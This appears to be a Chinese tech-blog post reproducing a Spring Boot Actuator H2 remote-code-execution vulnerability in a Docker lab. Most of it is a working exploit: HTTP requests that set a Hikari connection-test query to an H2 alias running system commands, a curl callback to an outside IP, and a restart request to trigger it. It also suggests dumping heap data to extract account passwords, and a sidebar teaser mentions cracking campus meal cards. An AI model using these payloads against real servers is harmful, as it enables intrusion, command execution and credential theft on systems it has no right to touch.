搜索
写文章提问
登录注册
展开

专栏首页开心分享-技术交流Spring Boot Actuator H2 RCE复现-解决篇

Spring Boot Actuator H2 RCE复现-解决篇

阅读 1450

原文:Spring Boot Actuator H2 RCE复现

前端时间碰到一个Actuator  信息泄露的然后复现了一下这个漏洞

  1. git clone https://github.com/spaceraccoon/spring-boot-actuator-h2-rce.git

(2) 使用docker启动环境

先cd进入spring-boot-actuator-h2-rce目录然后执行以下命令

docker build -t spaceraccoon/spring-boot-rce-lab .
docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab

(3) 访问:http://39.105.93.185:8080/actuator

0x02 漏洞复现 (1)发送如下POST包配置spring.datasource.hikari.connection-test-query的值

POST /actuator/env HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 389
{"name":"spring.datasource.hikari.connection-test-query","value":"CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException();}'; CALL EXEC('curl 39.105.93.185:8081');"}

(2)查看/actuator/env

(3)向端点 /actuator/restart 发送POST请求,重启应用

POST /actuator/restart HTTP/1.1
Host: 39.105.93.185:8080
Content-Type: application/json
Content-Length: 356
{}

(4) 查看nc

PS : 有些机器不出网的时候可以利用dump 获取信息 然后使用软件导出账号密码如下:

软件地址: 云盘下载

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

展开阅读全文
举报

我来说两句

0 条评论
登录 后参与评论

相关文章

  • Spring Boot Actuator H2 RCE复现

    Spring Boot框架是最流行的基于Java的微服务框架之一,可帮助开发人员快速轻松地部署Java应用程序,加快开发过程。当Spring Boot Actu...

    开心分享

  • 成功破解校园饭卡并充值1万元!

    继上次水卡的成功破解,对学校的饭卡也有点想要研究的念头了。既然这样,打铁趁热马上开始动手,先拿出MCT测试一下卡类型和扇区情况先。(不了解相关工具和术语的去看看...

    开心分享

  • ThinkPHP5远程命令执行漏洞

    ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化企 业应用开发而诞生的。由于其简单易用,国内用户众多...

    开心分享

  • 折腾网站记录之整体搬家

    TIPS:以下所有操作内容请您在网站有备份的情况下尝试,数据无价,请小心操作。 我只对我自己的网站负责,由于操作失误,导致网站数据丢失,跟我也没有关系。

    歪先生

  • 什么是智慧建筑生态圈?如何助推建筑行业整体升级

    新中国成立至今70年,也是建筑业高速发展的70年,虽然产值不断提升,支柱定位也逐渐确定,对保障和改善人民生活的作用尤为重要。然而长期发展以来,建筑业仍是粗放和劳...

    全球共德

  • 云服务器快速构建WordPress博客

    最近搞了一个博客,采用WordPress搭建的,其实本来就依托cnblog和公众号更新博文,想想自己搞一个会更好一些,独立一些,而且可以配置独立域名和主体,随之...

    风间影月

  • iOS App 安全测试一、数据存储安全二、 数据通信安全三、 URL protocol handler / IPC四、 UIWebView

    VV木公子

  • Java动态代理一览笔录

    1、什么是代理? 比较经典的含义如销售代理,签订合同的基础上,为委托人(厂商)销售某些特定产品或全部产品的代理商,对价格、条款及其他交易条件可全权处理。我们从销...

    斯武丶风晴

  • Python|张量创建操作[3]

    说一下zeros与zeroslike和类似函数的区别。zeros是指定输出张量的形状size,然后返回张量,zeroslike则是根据一个张量,返回这个张量形状...

    Rare0716

  • 选择Kong作为你的API网关

    在微服务架构之下,服务被拆的非常零散,降低了耦合度的同时也给服务的统一管理增加了难度。如上图左所示,在旧的服务治理体系之下,鉴权,限流,日志,监控等通用功能需要...

    kirito-moe
更多文章

作者介绍

开心分享

开心分享论坛创始人
专栏

精选专题

活动推荐

运营活动

活动名称
广告关闭

扫码关注云+社区

领取腾讯云代金券